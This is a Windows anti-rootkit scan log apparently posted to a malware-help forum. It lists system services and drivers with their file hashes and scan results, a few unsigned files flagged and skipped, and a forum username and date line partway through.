16:00:21.0419 0x42d8 [ 15D6EFED817CE145FF05A9829050D547, 8ABE7E22C146F2EEE3F3F3713C92BC1D6734477E488872D22ABE2188D2077A39 ] C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
16:00:21.0809 0x42d8 ANT Agent - detected UnsignedFile.Multi.Generic ( 1 )
16:00:24.0617 0x42d8 Detect skipped due to KSN trusted
16:00:24.0617 0x42d8 ANT Agent - ok
16:00:24.0742 0x42d8 [ 42170B17D82FF8059BA28C7B7AE8F097, 82E2DD884D75767E09884798925355FF9ACBFE0014A0CAED1EE97159D1FD164A ] C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe
16:00:24.0773 0x42d8 FlashPlayerUpdate - ok
16:00:24.0773 0x42d8 Waiting for KSN requests completion. In queue: 6
16:00:25.0787 0x42d8 Waiting for KSN requests completion. In queue: 6
16:00:26.0801 0x42d8 Waiting for KSN requests completion. In queue: 1
16:00:27.0831 0x42d8 AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.6.305.0 ), 0x61000 ( enabled : updated )
16:00:27.0862 0x42d8 Win FW state via NFP2: enabled
16:00:30.0389 0x42d8 ============================================================
16:00:30.0389 0x42d8 Scan finished
16:00:30.0389 0x42d8 ============================================================
16:00:30.0389 0x4298 Detected object count: 1
16:00:30.0389 0x4298 Actual detected object count: 1
16:00:59.0062 0x4298 OSD Utility ( UnsignedFile.Multi.Generic ) - skipped by user
16:00:59.0062 0x4298 OSD Utility ( UnsignedFile.Multi.Generic ) - User select action: Skip
16:01:48.0436 0x4af4 ============================================================
16:01:48.0436 0x4af4 Scan started
16:01:48.0436 0x4af4 Mode: Manual; SigCheck; TDLFS;
16:01:48.0436 0x4af4 ============================================================
16:01:48.0436 0x4af4 KSN ping started
16:01:50.0963 0x4af4 KSN ping finished: true
16:01:51.0353 0x4af4 ================ Scan system memory ========================
16:01:51.0353 0x4af4 System memory - ok
16:01:51.0353 0x4af4 ================ Scan services =============================
16:01:51.0478 0x4af4 [ FEF046400B75C4495AEC3D8A8CCE6014, 7A176DE9DD19A6F155AF0DBCD52C2AEF0F745018F4969C286DE62DA6D5C33DDA ] 1394ohci C:\Windows\system32\drivers\1394ohci.sys
16:01:51.0509 0x4af4 1394ohci - ok
16:01:51.0618 0x4af4 [ F84676C7D6684E86D3F05B2C5E9019B1, 6F8F4ACD47521878C1877F4D1DFFC8A11AE560E6933B7C55EAC833CCFEE1BDE5 ] ACPI C:\Windows\system32\drivers\ACPI.sys
16:01:51.0650 0x4af4 ACPI - ok
16:01:51.0665 0x4af4 [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi C:\Windows\system32\drivers\acpipmi.sys
16:01:51.0696 0x4af4 AcpiPmi - ok
16:01:51.0790 0x4af4 [ C5679E5186B2FC95BC76A8A9870D5456, 70AC61850B811A0A902532F098AE1D5DF4622455E56C78B89D4ABDBE4A061A48 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
16:01:51.0806 0x4af4 AdobeARMservice - ok
16:01:51.0915 0x4af4 [ 4ECFCAAE5CB380F58934F0DCF5F64E7F, D82B37E57D93484D7A3CB65470BCD54A578A695F0203A8DD441B1348C1EEA751 ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
16:01:51.0930 0x4af4 AdobeFlashPlayerUpdateSvc - ok
16:01:51.0993 0x4af4 [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
16:01:52.0024 0x4af4 adp94xx - ok
16:01:52.0133 0x4af4 [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci C:\Windows\system32\drivers\adpahci.sys
16:01:52.0149 0x4af4 adpahci - ok
16:01:52.0211 0x4af4 [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320 C:\Windows\system32\drivers\adpu320.sys
16:01:52.0227 0x4af4 adpu320 - ok
16:01:52.0258 0x4af4 [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
16:01:52.0289 0x4af4 AeLookupSvc - ok
16:01:52.0320 0x4af4 [ FA886682CFC5D36718D3E436AACF10B9, F80AB4F91AA6B5C7ECCB000D8E1BC2CF776DC3D69B3D9EBC2558C19035A6B3AB ] AFD C:\Windows\system32\drivers\afd.sys
16:01:52.0336 0x4af4 AFD - ok
16:01:52.0352 0x4af4 [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440 C:\Windows\system32\drivers\agp440.sys
16:01:52.0352 0x4af4 agp440 - ok
16:01:52.0352 0x4af4 [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG C:\Windows\System32\alg.exe
16:01:52.0367 0x4af4 ALG - ok
16:01:52.0398 0x4af4 [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide C:\Windows\system32\drivers\aliide.sys
16:01:52.0398 0x4af4 aliide - ok
16:01:52.0430 0x4af4 [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide C:\Windows\system32\drivers\amdide.sys
16:01:52.0430 0x4af4 amdide - ok
16:01:52.0445 0x4af4 [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
16:01:52.0461 0x4af4 AmdK8 - ok
16:01:52.0461 0x4af4 [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM C:\Windows\system32\drivers\amdppm.sys
16:01:52.0476 0x4af4 AmdPPM - ok
16:01:52.0492 0x4af4 [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata C:\Windows\system32\drivers\amdsata.sys
16:01:52.0492 0x4af4 amdsata - ok
16:01:52.0508 0x4af4 [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs C:\Windows\system32\drivers\amdsbs.sys
16:01:52.0523 0x4af4 amdsbs - ok
16:01:52.0539 0x4af4 [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata C:\Windows\system32\drivers\amdxata.sys
16:01:52.0539 0x4af4 amdxata - ok
16:01:52.0570 0x4af4 [ E1D50C4B23B1DD2D5B97DAE215A400C9, 54D17CD3486014CDED22FAF89727A1BA709F83BFC6E0EBBDBF16840BC24D8628 ] AppID C:\Windows\system32\drivers\appid.sys
16:01:52.0586 0x4af4 AppID - ok
16:01:52.0601 0x4af4 [ EA673696AA352A0D87091C794C69C407, C04CC376B46904A6E067DC9FCDB3E1EA321A69E7DD1B4916BD48ED0D3535A655 ] AppIDSvc C:\Windows\System32\appidsvc.dll
16:01:52.0617 0x4af4 AppIDSvc - ok
16:01:52.0648 0x4af4 [ 9D2A2369AB4B08A4905FE72DB104498F, D6FA1705018BABABFA2362E05691A0D6408D14DE7B76129B16D0A1DAD6378E58 ] Appinfo C:\Windows\System32\appinfo.dll
16:01:52.0648 0x4af4 Appinfo - ok
16:01:52.0710 0x4af4 [ 221564CC7BE37611FE15EACF443E1BF6, 381BDF17418C779D72332431BA174C2AD76CD9C7C1711FF5142EA9B05D5555E4 ] Apple Mobile Device C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
16:01:52.0726 0x4af4 Apple Mobile Device - ok
16:01:52.0757 0x4af4 [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc C:\Windows\system32\drivers\arc.sys
16:01:52.0773 0x4af4 arc - ok
16:01:52.0788 0x4af4 [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas C:\Windows\system32\drivers\arcsas.sys
16:01:52.0804 0x4af4 arcsas - ok
16:01:52.0913 0x4af4 [ 9A262EDD17F8473B91B333D6B031A901, 05DFBD3A7D83FDE1D062EA719ACA9EC48CB7FD42D17DDD88B82E5D25469ADD23 ] aspnet_state C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
16:01:52.0929 0x4af4 aspnet_state - ok
16:01:52.0944 0x4af4 [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
16:01:52.0976 0x4af4 AsyncMac - ok
16:01:52.0991 0x4af4 [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi C:\Windows\system32\drivers\atapi.sys
16:01:53.0007 0x4af4 atapi - ok
16:01:53.0022 0x4af4 [ BCC09E0B0362741D0C084828A1B950F3, 0B63874E4ED11EFC626144BEE964BBEED665466582FC5DC12333C02101EF414C ] AthBTPort C:\Windows\system32\DRIVERS\btath_flt.sys
16:01:53.0022 0x4af4 AthBTPort - ok
16:01:53.0085 0x4af4 [ 379A6AB7F2AD8FC61B1306767083D705, 7B484048EC2A66EA09D4B5B9312C517A9C3618C7A5B952E863DF31DE9EA38603 ] AtherosSvc C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
16:01:53.0100 0x4af4 AtherosSvc - detected UnsignedFile.Multi.Generic ( 1 )
16:01:53.0100 0x4af4 Detect skipped due to KSN trusted
16:01:53.0100 0x4af4 AtherosSvc - ok
16:01:53.0210 0x4af4 [ 4EF8D5C1C0A02A9D1C2C465BA730EE69, 7F95825CE146FA8C6F8E0C8689D8750664622FD38E1FBD85231C58C880474E86 ] athr C:\Windows\system32\DRIVERS\athrx.sys
16:01:53.0288 0x4af4 athr - ok
16:01:53.0319 0x4af4 [ 2C1B6A64294F2182DC4999F923873974, 6D611636D849631BB1F852DC03A98BBFEC4D797A2707CA63427E187F0725A796 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
16:01:53.0334 0x4af4 AudioEndpointBuilder - ok
16:01:53.0350 0x4af4 [ 2C1B6A64294F2182DC4999F923873974, 6D611636D849631BB1F852DC03A98BBFEC4D797A2707CA63427E187F0725A796 ] AudioSrv C:\Windows\System32\Audiosrv.dll
16:01:53.0381 0x4af4 AudioSrv - ok
16:01:53.0397 0x4af4 [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV C:\Windows\System32\AxInstSV.dll
16:01:53.0412 0x4af4 AxInstSV - ok
16:01:53.0444 0x4af4 [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv C:\Windows\system32\drivers\bxvbda.sys
16:01:53.0459 0x4af4 b06bdrv - ok
16:01:53.0490 0x4af4 [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a C:\Windows\system32\DRIVERS\b57nd60a.sys
16:01:53.0490 0x4af4 b57nd60a - ok
16:01:53.0506 0x4af4 [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC C:\Windows\System32\bdesvc.dll
16:01:53.0522 0x4af4 BDESVC - ok
16:01:53.0537 0x4af4 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep C:\Windows\system32\drivers\Beep.sys
16:01:53.0553 0x4af4 Beep - ok
16:01:53.0584 0x4af4 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE C:\Windows\System32\bfe.dll
16:01:53.0615 0x4af4 BFE - ok
16:01:53.0662 0x4af4 [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS C:\Windows\system32\qmgr.dll
16:01:53.0693 0x4af4 BITS - ok
16:01:53.0709 0x4af4 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys
16:01:53.0709 0x4af4 blbdrive - ok
16:01:53.0771 0x4af4 [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD, 17BFFC5DF609CE3B2F0CAB4BD6C118608C66A3AD86116A47E90B2BB7D8954122 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
16:01:53.0787 0x4af4 Bonjour Service - ok
16:01:53.0818 0x4af4 [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] bowser C:\Windows\system32\DRIVERS\bowser.sys
16:01:53.0834 0x4af4 bowser - ok
16:01:53.0849 0x4af4 [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo C:\Windows\system32\drivers\BrFiltLo.sys
16:01:53.0849 0x4af4 BrFiltLo - ok
16:01:53.0865 0x4af4 [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp C:\Windows\system32\drivers\BrFiltUp.sys
16:01:53.0880 0x4af4 BrFiltUp - ok
16:01:53.0896 0x4af4 [ 5C2F352A4E961D72518261257AAE204B, 9EE1001E1D46A414A7A86FE1DBBE232203E26F54D9EF43ED31ED8EACD4D09853 ] BridgeMP C:\Windows\system32\DRIVERS\bridge.sys
16:01:53.0927 0x4af4 BridgeMP - ok
16:01:53.0958 0x4af4 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser C:\Windows\System32\browser.dll
16:01:53.0974 0x4af4 Browser - ok
16:01:53.0990 0x4af4 [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid C:\Windows\System32\Drivers\Brserid.sys
16:01:54.0021 0x4af4 Brserid - ok
16:01:54.0021 0x4af4 [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm C:\Windows\System32\Drivers\BrSerWdm.sys
16:01:54.0036 0x4af4 BrSerWdm - ok
16:01:54.0036 0x4af4 [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm C:\Windows\System32\Drivers\BrUsbMdm.sys
16:01:54.0052 0x4af4 BrUsbMdm - ok
16:01:54.0052 0x4af4 [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer C:\Windows\System32\Drivers\BrUsbSer.sys
16:01:54.0052 0x4af4 BrUsbSer - ok
16:01:54.0083 0x4af4 [ C05ED3246C06EC56F10D85B0304CD09E, F479ED840D5BA4244391ABBB91D75D77D7A7D3F73F9AD45B7C7A137321B536AE ] BTATH_A2DP C:\Windows\system32\drivers\btath_a2dp.sys
16:01:54.0099 0x4af4 BTATH_A2DP - ok
16:01:54.0114 0x4af4 [ 2D27F7A831657D63AFC78E5E78DCA83F, 916A7B13A0BBFD62BEF2B124B75FDD675A29D6D939FEA0AD555D5B23DCEECB69 ] btath_avdt C:\Windows\system32\drivers\btath_avdt.sys
16:01:54.0130 0x4af4 btath_avdt - ok
16:01:54.0161 0x4af4 [ E6B734A37ADE36FE1A77035F4E484C8C, 7F3AB1E0CF9F348633B3B325F5F365CCD4C7FF7E4564BDE02C2DA27A499D0234 ] BTATH_BUS C:\Windows\system32\DRIVERS\btath_bus.sys
16:01:54.0161 0x4af4 BTATH_BUS - ok
16:01:54.0177 0x4af4 [ FB3833E63FF602B69C2FF085846DCF43, 468BC9580341AD4C65F0BBB3A11F3E39C1DD0F9694D098AB3647A181C03E4E11 ] BTATH_HCRP C:\Windows\system32\DRIVERS\btath_hcrp.sys
16:01:54.0177 0x4af4 BTATH_HCRP - ok
16:01:54.0192 0x4af4 [ 371A11C1333BA526263A987A93ACDE3D, 80E15B815F2B6F4AFBDDB115C4F54126F5D2796F6ACB387DEA9C4A1C061EB7EB ] BTATH_LWFLT C:\Windows\system32\DRIVERS\btath_lwflt.sys
16:01:54.0208 0x4af4 BTATH_LWFLT - ok
16:01:54.0224 0x4af4 [ ABCD3C16CA850A7594CEB9AD5D966810, DB0EAF000BB6F12F2AA550B66F5C61E08F2C6E58A18DA40BE69DD2B662D1EC60 ] BTATH_RCP C:\Windows\system32\DRIVERS\btath_rcp.sys
16:01:54.0224 0x4af4 BTATH_RCP - ok
16:01:54.0286 0x4af4 [ 13BDB661991ACF40ADCB09BD64A8CBEF, E0DA4A5F11F5175EF30019673F2B3675CA825466025D8494AE35E721D2E307CE ] BtFilter C:\Windows\system32\DRIVERS\btfilter.sys
16:01:54.0302 0x4af4 BtFilter - ok
16:01:54.0333 0x4af4 [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] BthEnum C:\Windows\system32\drivers\BthEnum.sys
16:01:54.0333 0x4af4 BthEnum - ok
16:01:54.0364 0x4af4 [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
16:01:54.0380 0x4af4 BTHMODEM - ok
16:01:54.0395 0x4af4 [ 02DD601B708DD0667E1331FA8518E9FF, 7DE6CC4DBB621CD03B01D9CE6CF66EAFE31D39030A391562CD0E278E1D70ADE1 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
16:01:54.0411 0x4af4 BthPan - ok
16:01:54.0458 0x4af4 [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] BTHPORT C:\Windows\System32\Drivers\BTHport.sys
16:01:54.0473 0x4af4 BTHPORT - ok
16:01:54.0504 0x4af4 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv C:\Windows\system32\bthserv.dll
16:01:54.0520 0x4af4 bthserv - ok
16:01:54.0551 0x4af4 [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] BTHUSB C:\Windows\System32\Drivers\BTHUSB.sys
16:01:54.0551 0x4af4 BTHUSB - ok
16:01:54.0551 0x4af4 catchme - ok
16:01:54.0567 0x4af4 [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
16:01:54.0582 0x4af4 cdfs - ok
16:01:54.0598 0x4af4 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
16:01:54.0614 0x4af4 cdrom - ok
16:01:54.0629 0x4af4 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc C:\Windows\System32\certprop.dll
16:01:54.0645 0x4af4 CertPropSvc - ok
16:01:54.0660 0x4af4 [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass C:\Windows\system32\drivers\circlass.sys
16:01:54.0676 0x4af4 circlass - ok
16:01:54.0692 0x4af4 [ 141205D6B1C5242FEF0CEFE57F4C213D, 1AF89683F5F217AA7FB7FF037E8EEC7174D05133C622D48A526B134669AAA124 ] CirrusLFD C:\Windows\system32\DRIVERS\CSLFDx64.sys
16:01:54.0692 0x4af4 CirrusLFD - ok
16:01:54.0707 0x4af4 [ FE1EC06F2253F691FE36217C592A0206, B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE ] CLFS C:\Windows\system32\CLFS.sys
16:01:54.0723 0x4af4 CLFS - ok
16:01:54.0785 0x4af4 [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
16:01:54.0801 0x4af4 clr_optimization_v2.0.50727_32 - ok
16:01:54.0848 0x4af4 [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
16:01:54.0863 0x4af4 clr_optimization_v2.0.50727_64 - ok
16:01:54.0910 0x4af4 [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
16:01:54.0926 0x4af4 clr_optimization_v4.0.30319_32 - ok
16:01:54.0941 0x4af4 [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
16:01:54.0957 0x4af4 clr_optimization_v4.0.30319_64 - ok
16:01:54.0972 0x4af4 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt C:\Windows\system32\drivers\CmBatt.sys
16:01:54.0972 0x4af4 CmBatt - ok
16:01:55.0019 0x4af4 [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide C:\Windows\system32\drivers\cmdide.sys
16:01:55.0035 0x4af4 cmdide - ok
16:01:55.0082 0x4af4 [ EBF28856F69CF094A902F884CF989706, AD6C9F0BC20AA49EEE5478DA0F856F0EA2B414B63208C5FFB03C9D7F5B59765F ] CNG C:\Windows\system32\Drivers\cng.sys
16:01:55.0097 0x4af4 CNG - ok
16:01:55.0128 0x4af4 [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt C:\Windows\system32\drivers\compbatt.sys
16:01:55.0128 0x4af4 Compbatt - ok
16:01:55.0144 0x4af4 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus C:\Windows\system32\drivers\CompositeBus.sys
16:01:55.0160 0x4af4 CompositeBus - ok
16:01:55.0160 0x4af4 COMSysApp - ok
16:01:55.0238 0x4af4 [ 5E5E266092CCC08BB81B0FBEE5B85760, 236F3B68C9B3A4C0FE868A184B49BF504252DBC929DFC4098781676F68AA70ED ] cphs C:\Windows\SysWow64\IntelCpHeciSvc.exe
16:01:55.0269 0x4af4 cphs - ok
ascot1340
2014-11-07, 23:37
16:01:55.0284 0x4af4 [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
16:01:55.0300 0x4af4 crcdisk - ok
16:01:55.0331 0x4af4 [ 19D511CC455C19DE1ADF60E6C39C85B6, 2A05DD5EF3D0BEC2C9F4EA186E0E2D0F7BE0BF6A473D51194B09D33773AC7FAA ] CryptSvc C:\Windows\system32\cryptsvc.dll
16:01:55.0347 0x4af4 CryptSvc - ok
16:01:55.0394 0x4af4 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] DcomLaunch C:\Windows\system32\rpcss.dll
16:01:55.0425 0x4af4 DcomLaunch - ok
16:01:55.0456 0x4af4 [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc C:\Windows\System32\defragsvc.dll
16:01:55.0503 0x4af4 defragsvc - ok
16:01:55.0534 0x4af4 [ 9BB2EF44EAA163B29C4A4587887A0FE4, 03667BC3EA5003F4236929C10F23D8F108AFCB29DB5559E751FB26DFB318636F ] DfsC C:\Windows\system32\Drivers\dfsc.sys
16:01:55.0550 0x4af4 DfsC - ok
16:01:55.0565 0x4af4 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp C:\Windows\system32\dhcpcore.dll
16:01:55.0581 0x4af4 Dhcp - ok
16:01:55.0596 0x4af4 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache C:\Windows\system32\drivers\discache.sys
16:01:55.0612 0x4af4 discache - ok
16:01:55.0643 0x4af4 [ 9819EEE8B5EA3784EC4AF3B137A5244C, 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427 ] Disk C:\Windows\system32\drivers\disk.sys
16:01:55.0643 0x4af4 Disk - ok
16:01:55.0690 0x4af4 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache C:\Windows\System32\dnsrslvr.dll
16:01:55.0690 0x4af4 Dnscache - ok
16:01:55.0706 0x4af4 [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc C:\Windows\System32\dot3svc.dll
16:01:55.0737 0x4af4 dot3svc - ok
16:01:55.0752 0x4af4 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS C:\Windows\system32\dps.dll
16:01:55.0768 0x4af4 DPS - ok
16:01:55.0784 0x4af4 [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
16:01:55.0799 0x4af4 drmkaud - ok
16:01:55.0862 0x4af4 [ F59E2FE2687A5C30598F9099F318EB73, 80A0B1CC758BD3C4AEAB8E5804120D8A145F918B527F41DEF02A0E4EBE170F37 ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
16:01:55.0877 0x4af4 DXGKrnl - ok
16:01:55.0908 0x4af4 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\Windows\System32\eapsvc.dll
16:01:55.0940 0x4af4 EapHost - ok
16:01:56.0049 0x4af4 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\Windows\system32\drivers\evbda.sys
16:01:56.0111 0x4af4 ebdrv - ok
16:01:56.0142 0x4af4 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] EFS C:\Windows\System32\lsass.exe
16:01:56.0158 0x4af4 EFS - ok
16:01:56.0220 0x4af4 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
16:01:56.0236 0x4af4 ehRecvr - ok
